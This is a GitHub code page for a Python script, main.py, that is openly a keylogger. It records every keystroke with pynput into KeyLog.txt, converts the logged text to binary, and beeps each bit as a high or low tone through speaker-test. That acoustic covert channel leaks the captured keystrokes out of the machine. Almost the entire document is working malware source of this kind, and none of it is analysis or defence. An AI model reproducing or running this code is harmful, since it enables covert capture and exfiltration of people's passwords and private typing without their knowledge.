-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathmain.py
65 lines (50 loc) · 1.83 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
from pynput.keyboard import Key, Listener
import logging
import subprocess
import time
# Function Definitions go under here
# on_press defines what is an event and what to log
def on_press(key):
logging.info(str(key))
# Converts a decimal input into binary using recursion
def decimal_to_binary(num):
return decimal_to_binary(num//2)+str(num%2) if num > 1 else str(num)
# Converts ascii data to binary, uses decimal_to_binary
def ascii_to_binary(character):
ascii = ord(character)
data = decimal_to_binary(ascii)
length = 8 -(len(data))
for i in range(length):
data = "0" + data
return data
# Main code starts from here
# Clearing the previous keylog and starting from scratch
open('KeyLog.txt', 'w').close()
logging.basicConfig(filename='KeyLog.txt', level=logging.DEBUG, format='%(message)s')
# This is the Keylogger functionality that breaks on ctrl+c
while True:
try:
with Listener(on_press=on_press) as listener:
listener.join()
except KeyboardInterrupt:
break
list_of_binary = []
key_log_file = open('KeyLog.txt', 'r').read()
# This is where we are converting the ascii character to binary and storing them in lob array
for i in key_log_file:
if i == "\'":
continue
else:
x = ascii_to_binary(i)
list_of_binary.append(x)
for i in range(9):
list_of_binary.pop()
# This beeping functionality will only work on a linux system as of now
for element in list_of_binary:
for i in element:
if i == '1':
subprocess.call('(speaker-test -t sine -f 2000 -c 10 -X) > /dev/null& pid=$!; sleep 0.15; kill -9 $pid', shell=True)
time.sleep(3)
elif i == '0':
subprocess.call('(speaker-test -t sine -f 1000 -c 10 -X) > /dev/null& pid=$!; sleep 0.15; kill -9 $pid', shell=True)
time.sleep(3)